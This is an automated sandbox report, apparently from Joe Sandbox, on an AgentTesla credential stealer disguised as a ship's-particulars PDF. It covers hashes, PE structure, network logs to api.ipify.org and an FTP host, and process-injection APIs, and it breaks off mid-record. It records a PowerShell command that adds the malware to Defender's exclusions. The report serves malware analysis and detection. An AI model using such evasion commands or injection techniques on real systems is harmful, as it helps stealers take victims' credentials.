Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 104.26.12.205
PO-841122676_g787.exe | malicious | GuLoader | 104.26.12.205
CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | malicious | AgentTesla | 104.26.12.205
Wire slip account payable.pif.exe | malicious | AgentTesla | 104.26.12.205
file.exe | malicious | LummaC | 104.26.12.205
Order requirements CIF Greece_pdf.exe | malicious | GuLoader, Snake Keylogger | 104.26.12.205
https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com | malicious | Unknown | 104.26.12.205
No context
Process: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.773832331134527
Encrypted: false
SSDEEP: 3:Nlllulx/:NllU
MD5: F57B3C748887161F8BB93941BD4BD122
SHA1: 95E5C6DE8FCECC4F1DA4FF59498636E99971AF92
SHA-256: 0723E06FAA4F308175FD8F153940229C06201CE6C82D16075320F26E777C3904
SHA-512: E11AF9E36F6DF3DAFB703A84757CB511A346BDC433C1A8A3B1907248CC53EC4CB42A3C8B16A42E5D72BBF6A9E942AF4C73C9001A58070E0476AE8B4A0B3291FB
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e.................................L.........................

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.526239595566343
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: MV BBG MUARA Ship's Particulars.pdf.scr.exe
File size: 979'456 bytes
MD5: 1779ee90e122ebe86f1bddc4ec06440d
SHA1: e8842b83a180e7589e366bd61b08f59a87a71734
SHA256: 941559a78b6e1caf39212048e7f62723e5f283d1942858cc07a339d6d6b24362
SHA512: a5b84316604b0728cf6cd29409f68a9b4b41b8437bf39ead5bac4ba7806339adeabd848c352a7b90be6bfbf57c709a3a1636ea2f0d655c0cce6b2f95e4c9faaf
SSDEEP: 12288:/csCELA+12Hd5lpvS36pDfi/xN3xIZrzfBVzxWWKy5siBjVE4wPLXkYVx5OjuRZx:0zf/zxWu5zW4wjkTuRZOVFuxztsrG
TLSH: 1825B02077F8DD67E27A61B3EAC8421197B6D146767BE3AA0CD560CE25C27321383D27
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....>g..............0......(......^.... ........@.. .......................`............@................................
Icon Hash: 130b253d1931012d
Entrypoint: 0x4ee65e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x673E9A8A [Thu Nov 21 02:27:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xee60c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xf0000          0x2588        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf4000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xec664       0xec800   a725ee12878a504296537ae23b36c3c2  False     0.73659755714852    data       7.528323979837935    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xf0000          0x2588        0x2600    0c2ed23f4b73d34a7def91b7ee71a2d0  False     0.8751027960526315  data       7.577009356017859    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xf4000          0xc           0x200     56d29d29c24a75d76e7ed4e57186142c  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                                     Language  Country  ZLIB Complexity
RT_ICON        0xf0100  0x2016  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                                 0.9504504504504504
RT_GROUP_ICON  0xf2128  0x14    data                                                                                                        1.05
RT_VERSION     0xf214c  0x23c   data                                                                                                        0.46853146853146854
RT_MANIFEST    0xf2398  0x1ea   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                           0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                          Source Port  Dest Port  Source IP      Dest IP
Nov 21, 2024 13:06:17.435720921 CET  49735        443        192.168.2.4    104.26.12.205
Nov 21, 2024 13:06:17.435758114 CET  443          49735      104.26.12.205  192.168.2.4
Nov 21, 2024 13:06:17.435834885 CET  49735        443        192.168.2.4    104.26.12.205
Nov 21, 2024 13:06:17.601142883 CET  49735        443        192.168.2.4    104.26.12.205
Nov 21, 2024 13:06:17.601165056 CET  443          49735      104.26.12.205  192.168.2.4
Nov 21, 2024 13:06:18.870743990 CET  443          49735      104.26.12.205  192.168.2.4
Nov 21, 2024 13:06:18.870845079 CET  49735        443        192.168.2.4    104.26.12.205
Nov 21, 2024 13:06:18.875483036 CET  49735        443        192.168.2.4    104.26.12.205
Nov 21, 2024 13:06:18.875503063 CET  443          49735      104.26.12.205  192.168.2.4
Nov 21, 2024 13:06:18.875884056 CET  443          49735      104.26.12.205  192.168.2.4
Nov 21, 2024 13:06:18.929224968 CET  49735        443        192.168.2.4    104.26.12.205
Nov 21, 2024 13:06:19.011527061 CET  49735        443        192.168.2.4    104.26.12.205
Nov 21, 2024 13:06:19.059338093 CET  443          49735      104.26.12.205  192.168.2.4
Nov 21, 2024 13:06:19.348870993 CET  443          49735      104.26.12.205  192.168.2.4
Nov 21, 2024 13:06:19.349035025 CET  443          49735      104.26.12.205  192.168.2.4
Nov 21, 2024 13:06:19.349309921 CET  49735        443        192.168.2.4    104.26.12.205
Nov 21, 2024 13:06:19.390930891 CET  49735        443        192.168.2.4    104.26.12.205
Nov 21, 2024 13:06:21.279850960 CET  49736        21         192.168.2.4    50.87.144.157
Nov 21, 2024 13:06:21.399930000 CET  21           49736      50.87.144.157  192.168.2.4
Nov 21, 2024 13:06:21.400029898 CET  49736        21         192.168.2.4    50.87.144.157
Nov 21, 2024 13:06:21.409563065 CET  49736        21         192.168.2.4    50.87.144.157
Nov 21, 2024 13:06:21.529881001 CET  21           49736      50.87.144.157  192.168.2.4
Nov 21, 2024 13:06:21.529959917 CET  49736        21         192.168.2.4    50.87.144.157
Timestamp                          Source Port  Dest Port  Source IP    Dest IP
Nov 21, 2024 13:06:17.114108086 CET  63893        53         192.168.2.4  1.1.1.1
Nov 21, 2024 13:06:17.340250969 CET  53           63893      1.1.1.1      192.168.2.4
Nov 21, 2024 13:06:20.755846977 CET  52038        53         192.168.2.4  1.1.1.1
Nov 21, 2024 13:06:21.279093027 CET  53           52038      1.1.1.1      192.168.2.4
Timestamp                          Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class        DNS over HTTPS
Nov 21, 2024 13:06:17.114108086 CET  192.168.2.4  1.1.1.1  0x1bcf    Standard query (0)  api.ipify.org   A (IP address)  IN (0x0001)  false
Nov 21, 2024 13:06:20.755846977 CET  192.168.2.4  1.1.1.1  0xe576    Standard query (0)  beirutrest.com  A (IP address)  IN (0x0001)  false
Timestamp                          Source IP  Dest IP      Trans ID  Reply Code    Name            CName  Address        Type            Class        DNS over HTTPS
Nov 21, 2024 13:06:17.340250969 CET  1.1.1.1    192.168.2.4  0x1bcf    No error (0)  api.ipify.org          104.26.12.205  A (IP address)  IN (0x0001)  false
Nov 21, 2024 13:06:17.340250969 CET  1.1.1.1    192.168.2.4  0x1bcf    No error (0)  api.ipify.org          172.67.74.152  A (IP address)  IN (0x0001)  false
Nov 21, 2024 13:06:17.340250969 CET  1.1.1.1    192.168.2.4  0x1bcf    No error (0)  api.ipify.org          104.26.13.205  A (IP address)  IN (0x0001)  false
Nov 21, 2024 13:06:21.279093027 CET  1.1.1.1    192.168.2.4  0xe576    No error (0)  beirutrest.com         50.87.144.157  A (IP address)  IN (0x0001)  false
• api.ipify.org
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
0           192.168.2.4  49735        104.26.12.205   443               796  C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe
Timestamp                Bytes transferred  Direction  Data
2024-11-21 12:06:19 UTC  155                OUT        GET / HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                       Host: api.ipify.org
                                                       Connection: Keep-Alive
2024-11-21 12:06:19 UTC  399                IN         HTTP/1.1 200 OK
                                                       Date: Thu, 21 Nov 2024 12:06:19 GMT
                                                       Content-Type: text/plain
                                                       Content-Length: 11
                                                       Connection: close
                                                       Vary: Origin
                                                       CF-Cache-Status: DYNAMIC
                                                       Server: cloudflare
                                                       CF-RAY: 8e608d91dda3427c-EWR
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1808049&cwnd=242&unsent_bytes=0&cid=75797b4134375d66&ts=492&x=0"
2024-11-21 12:06:19 UTC  11                 IN         Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                       Data Ascii: 8.46.123.75


Target ID: 0
Start time: 07:06:04
Start date: 21/11/2024
Path: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Imagebase: 0x30000
File size: 979'456 bytes
MD5 hash: 1779EE90E122EBE86F1BDDC4EC06440D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1820711879.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 07:06:14
Start date: 21/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Imagebase: 0x390000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 07:06:15
Start date: 21/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 07:06:14
Start date: 21/11/2024
Path: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Imagebase: 0x970000
File size: 979'456 bytes
MD5 hash: 1779EE90E122EBE86F1BDDC4EC06440D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4188253761.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false


                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:10.3%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:1.3%
                                                                                                                  Total number of Nodes:159
                                                                                                                  Total number of Limit Nodes:11
                                                                                                                  execution_graph: node/edge listing of the rendered execution graph (graph image not recoverable from the extracted text). Nodes lie in the 0x6C9xxxx (dumped module at 06C90000) and 0xB5xxxx (module at 00B50000) ranges. Windows API calls reachable in the graph: PostMessageW, DuplicateHandle, GetModuleHandleW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, CreateActCtxA.
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dbefa349140b259a8df58d69f4570726d75490180ac9270ad1b923397441fcbe
                                                                                                                  • Instruction ID: f8f030ec36b35ea3bcbde48e59971dffc06026c6f17eab32cf2e54501d0fabac
                                                                                                                  • Opcode Fuzzy Hash: dbefa349140b259a8df58d69f4570726d75490180ac9270ad1b923397441fcbe
                                                                                                                  • Instruction Fuzzy Hash: 19E1CC70B006049FDB69DBB5C558BAFBBF6AF89700F1444ADE106AB290CB35ED05CB61
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e57c8a021b669e29d11636925a5b9498e115ae7f5b24687174022745e2cbc484
                                                                                                                  • Instruction ID: 4ffb249f9cce37f623c440b96018a2cb94e07172f6022e60a31c0d135acd43c6
                                                                                                                  • Opcode Fuzzy Hash: e57c8a021b669e29d11636925a5b9498e115ae7f5b24687174022745e2cbc484
                                                                                                                  • Instruction Fuzzy Hash: 08414A71D44619CFEB64CF55C848BE9BBB9BF4A300F1495AAD519A2240EB709AC1CF90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 04534e5107c7355dda962c728b31a530e658fe08fe3bbd2eacde53aa1c83fd88
                                                                                                                  • Instruction ID: 622093a47f015915e61cf6bdb3765299dda70c4efcc963cc1a8725aac206496b
                                                                                                                  • Opcode Fuzzy Hash: 04534e5107c7355dda962c728b31a530e658fe08fe3bbd2eacde53aa1c83fd88
                                                                                                                  • Instruction Fuzzy Hash: 2C21F4B0D056189BEB18CFA7C9597DEBEF6AF89304F04C06AD409B6264DB7409468BA0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph: basic blocks b5cf90-b5d16d (graph rendering not recoverable from the extracted text); calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId and the internal routine b5d578.
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B5D01E
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00B5D05B
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B5D098
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B5D0F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: a496005354fca0062d7a09e2a32957444c0dd64dd5bb8e518d6929274f728566
                                                                                                                  • Instruction ID: 2d9e444120fb551702d573406f1669b4042d020d21328df1353e0a30636fdc73
                                                                                                                  • Opcode Fuzzy Hash: a496005354fca0062d7a09e2a32957444c0dd64dd5bb8e518d6929274f728566
                                                                                                                  • Instruction Fuzzy Hash: A95187B09003498FDB64CFA9D948BDEBFF1EF88314F24849AE408A73A0D7745884CB65

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph: basic blocks b5cfa0-b5d16d (graph rendering not recoverable from the extracted text); calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId and the internal routine b5d578.
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B5D01E
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00B5D05B
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B5D098
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B5D0F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: a390e5cb71f759d90ea319c9472848568b39223d1d9a919808d191c37cee4169
                                                                                                                  • Instruction ID: 1ad5173fbca16f274ba78fb48ab142ed3e9c7ee1dfa489bb3574e0aee5e1e1e3
                                                                                                                  • Opcode Fuzzy Hash: a390e5cb71f759d90ea319c9472848568b39223d1d9a919808d191c37cee4169
                                                                                                                  • Instruction Fuzzy Hash: E65178B0900349CFDB64CFA9D948B9EBBF1EF88314F24849AE508A7390D7745984CF65

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph: basic blocks b5ad08-b5af88 (graph rendering not recoverable from the extracted text); calls GetModuleHandleW and the internal routines b5a02c, b5afa0/b5af90, b5a038, b5a048, b5a058, b5a068, b5b2a0/b5b290.
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B5AF5E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID: dRp$dRp
                                                                                                                  • API String ID: 4139908857-3792169924
                                                                                                                  • Opcode ID: 8f532de9572f622d00ba7231e44ddc7c430f13df4735398eb43cff8f33fa025a
                                                                                                                  • Instruction ID: 1c7fb993a71b159bb0f6a7cf59cb8667eb870fedd26e781365d0469429d2a8a0
                                                                                                                  • Opcode Fuzzy Hash: 8f532de9572f622d00ba7231e44ddc7c430f13df4735398eb43cff8f33fa025a
                                                                                                                  • Instruction Fuzzy Hash: EF816870A00B058FDB64DF29D44175ABBF1FF88305F108AADD886E7A90DB74E849CB91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph: basic blocks 6c97a34-6c97d85 (graph rendering not recoverable from the extracted text); calls CreateProcessA.
                                                                                                                  APIs
                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C97C76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: d67d28bda6334e750d75f1e6b842edbee4ba458d32d29495cbd952f13cb384f4
                                                                                                                  • Instruction ID: 26285eecc04bdfe083b0461580873822160d6951cd36815a0a1bacde0d6029f8
